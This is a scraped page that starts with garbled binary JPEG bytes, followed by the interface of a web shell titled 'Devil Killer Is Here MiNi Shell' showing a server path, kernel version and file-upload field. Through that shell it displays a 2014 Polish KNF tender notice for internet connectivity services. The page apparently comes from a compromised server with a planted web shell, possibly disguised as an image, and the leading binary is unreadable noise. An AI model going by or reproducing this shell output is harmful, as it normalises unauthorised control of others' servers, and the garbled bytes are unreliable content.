JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/125196-N-2014.html

<p class="kh_header"><b>Warszawa: Świadczenie usługi dostępu do sieci Internet</b><br>
<b>Numer ogłoszenia: 125196 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Komisji Nadzoru Finansowego , Pl. Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 22 2625240;2625276;2625263, faks 22 2625274.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.knf.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi dostępu do sieci Internet.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia
Część I - Świadczenie usługi dostępu do sieci Internet - łącze podstawowe
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza podstawowego do sieci Internet o przepustowości co najmniej 100 Mbit/s w lokalizacji Narodowy Bank Polski ul. Świętokrzyskiej 11/21 (COK-L1) w Warszawie. Łącze musi być wykonane w technologii przewodowej i zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
2.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza podstawowego do sieci Internet o przepustowości co najmniej 100 Mbit/s  w lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie. Łącze musi być wykonane w technologii przewodowej i zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
3.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
4.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 100 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami
II. Warunki dodatkowe w zakresie realizacji przedmiotu zamówienia.
Warunkiem koniecznym jest uzyskanie od NBP pozwolenia na świadczenie usług w lokalizacji NBP ul. Świętokrzyska 11/21  (COK-L1) w Warszawa.
Zamawiający zastrzega sobie możliwość zmiany z dniem 01.12.2014 lokalizacji świadczenia usługi i przeniesienia jej z lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie do lokalizacji UKNF ul. Niedźwiedzia 6E w Warszawie.
Część II - Świadczenie usługi dostępu do sieci Internet - łącze zapasowe 
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza zapasowego do sieci Internet o przepustowości co najmniej 20 Mbit/s w lokalizacji Narodowy Bank Polski ul. Świętokrzyskiej 11/21 (COK-L1) w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
2.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza zapasowego do sieci Internet o przepustowości co najmniej 20 Mbit/s w lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
3.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
4.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 20 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami
II. Warunki dodatkowe w zakresie realizacji przedmiotu zamówienia.
Warunkiem koniecznym jest uzyskanie od NBP pozwolenia na świadczenie usług w lokalizacji NBP ul. Świętokrzyska 11/21  (COK-L1) w Warszawa.
Zamawiający zastrzega sobie możliwość zmiany z dniem 01.12.2014 lokalizacji świadczenia usługi i przeniesienia jej z lokalizacji IBM ul. 1 Sierpnia 6 w Warszawie do lokalizacji UKNF ul. Niedźwiedzia 6E w Warszawie.
UWAGA: 
Warunkiem obligatoryjnym jest aby łącza dla części I i części II pochodziły od dwóch niezależnych operatorów. Wykonawca nie może składać jednocześnie oferty na część I i część II.
Część III - Świadczenie usługi dostępu do sieci Internet - ul. Jasna 12
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza kablowego lub radiowego do sieci Internet o przepustowości co najmniej 16 Mbit/s w lokalizacji UKNF ul. Jasna12 w Warszawie. Łącze musi być zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
2.W ramach dostępu do łącza internetowego zapewnienie dla Zamawiającego przez Wykonawcę 30 publicznych adresów IP,
3.W ramach dostępu do łącza internetowego zapewnienie przez Wykonawcę obsługi routingu BGP dla systemu autonomicznego (AS) Zamawiającego.
4.Utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu, przez okres obowiązywania umowy.
5.Zagwarantowanie przesyłania ciągłego strumienia danych z prędkością, co najmniej 16 Mbit/s, do operatorów trzecich tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku.
6.Zapewnienie następujących minimalnych parametrów SLA:
a.Miesięczna Dostępność Usługi - 99,5% (Wartość Progowa)
b.Czas Reakcji na awarię - 20 minut,
c.Czas Usunięcia awarii - 24 godziny.
Gdzie:
-Awaria - każda sytuacja, w której usługa nie jest świadczona zgodnie z założonymi w niniejszej umowie parametrami. W przypadku ponownego wystąpienia tego samego problemu w ciągu do 1 godziny od usunięcia poprzedniej awarii, zdarzenie traktowane jest jako ta sama awaria, o łącznym czasie trwania liczonym od chwili rozpoczęcia pierwszej awarii.
-Miesięczna Dostępność Usługi - wyrażona w % sumaryczna liczba godzin dostępności usługi dla danego łącza w stosunku do całkowitej liczby godzin w miesiącu kalendarzowym (nie dotyczy uzgodnionych z Zamawiającym prac serwisowych Wykonawcy)
-Czas Reakcji na awarię - czas pomiędzy zgłoszeniem awarii przez Zamawiającego lub stwierdzeniem jej przez Wykonawcę a podjęciem przez Wykonawcę działań zmierzających do jej usunięcia.
-Czas Usunięcia awarii - czas przywrócenia pełnej funkcjonalności usługi, zgodnie z założonymi parametrami.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 72.40.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium w kwocie:- dla części I: 2100, 00 zł (słownie: dwa tysiące sto złotych),
- dla części II: 1500, 00 zł (słownie: jeden tysiąc pięćset złotych)
- dla części III: 600,00 zł ( słownie: sześćset złotych)
2. Wadium może być wniesione w:
- pieniądzu;
- poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
- gwarancjach bankowych;
- gwarancjach ubezpieczeniowych;
- poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275).
3. Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy: Bank Gospodarstwa Krajowego w Warszawie, Al. Jerozolimskie 7, nr konta  43 1130 1062 0000 0576 4220 0001,  z dopiskiem: Część I - Świadczenie usługi dostępu do sieci Internet- łącze podstawowe lub Część II - Świadczenie usługi dostępu do sieci Internet- łącze zapasowe i/lub Część III - Świadczenie usługi dostępu do sieci Internet- ul. Jasna 12
Wniesienie wadium w pieniądzu będzie skuteczne jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
4. Wadium winno znaleźć się na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.
5. W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kserokopię dokumentu potwierdzającego wniesienie wadium należy dołączyć do oferty, natomiast oryginał gwarancji/poręczenia należy umieścić w ofercie w sposób umożliwiający jego zwrot zgodnie z zapisami ustawy Pzp.
6. Dokument wadium wniesionego w formie gwarancji/poręczenia powinien zawierać klauzulę o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie. Wadium takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.
7. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
8. Zgodnie z art. 46 ust. 4a ustawy Pzp Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie do uzupełnienia dokumentów, o którym mowa  w art. 26 ust. 3 ustawy Pzp nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust.1 ustawy lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
9. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b)nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
Brak wniesienia wadium na warunkach jak wyżej spowoduje wykluczenie Wykonawcy z postępowania (art. 24 ust. 2 pkt. 2 ustawy).
Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert. 
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium, po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, jeżeli w wyniku ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada ważny wpis do rejestru przedsiębiorców telekomunikacyjnych uprawniający do prowadzenia działalności gospodarczej w zakresie działalności komunikacyjnej, o którym mowa w art. 10 ust. 1 i art. 11 ustawy z dnia 16 lipca 2004 r. Prawo Telekomunikacyjne.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy części I , II i III.
Zamawiający uzna  warunek za spełniony, jeżeli Wykonawca udokumentuje posiadanie niezbędnej wiedzy i doświadczenia tj. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał lub są w trakcie należytego wykonywania co najmniej jednego zamówienie polegające na świadczeniu usług dzierżawy łącza Internetowego o wartości brutto minimum 30 000 zł. i przedstawi dokumenty potwierdzające należyte ich wykonanie. W przypadku wykonywanej usługi dzierżawy łącza Internetowego, o których mowa wyżej, Wykonawca musi wykazać należyte zrealizowanie wymaganej minimalnej wartości brutto dla zamówienia na dzień składania ofert.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - przepustowość łącza - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z art. 144 ust. 1 PZP Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w wypadku wystąpienia jednej z następujących okoliczności:
a)w przypadku zmiany stanu prawnego lub faktycznego, które mają wpływ na treść zawartej umowy,
b) w przypadku zmiany kwoty podatku VAT i kwoty wynagrodzenia brutto, które spowodowane są zmianą urzędowej stawki podatku VAT,
c)w przypadku zmian podmiotowych po stronie Wykonawcy lub Zamawiającego,
d)w przypadku wystąpienia wszelkich obiektywnych zmian niezbędnych do prawidłowego wykonania przedmiotu umowy, jeżeli taka zmiana leży w interesie publicznym,
e)w przypadku gdy konieczność wprowadzenia zmian będzie dotyczyć treści o charakterze informacyjno-instrukcyjnym, niezbędnych dla sprawnej realizacji Umowy, w szczególności zmian dotyczących zmiany osób upoważnionych do kontaktów, zmiany osób odpowiedzialnych za potwierdzenie prawidłowej realizacji zamówienia wraz z numerami tel., faksu, adresu poczty elektronicznej etc.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.knf.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Niedźwiedzia 6e, 02-737 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 09:00, miejsce: Biuro Podawcze, Pl. Powstańców Warszawy 1, wejście  od ul. Boduena.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usługi dostępu do sieci Internet- łącze podstawowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część I - Świadczenie usługi dostępu do sieci Internet - łącze podstawowe
CPV: 72.40.00.00.- 4 usługi internetowe.
I. Opis przedmiotu zamówienia
Przedmiotem zamówienia jest
1.Uruchomienie i utrzymanie przez okres 24 miesięcy symetrycznego łącza podstawowego do sieci Internet o przepustowości co najmniej 100 Mbit/s w lokalizacji Narodowy Bank Polski ul. Świętokrzyskiej 11/21 (COK-L1) w Warszawie. Łącze musi być wykonane w technologii przewodowej i zakończone interfejsem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni.
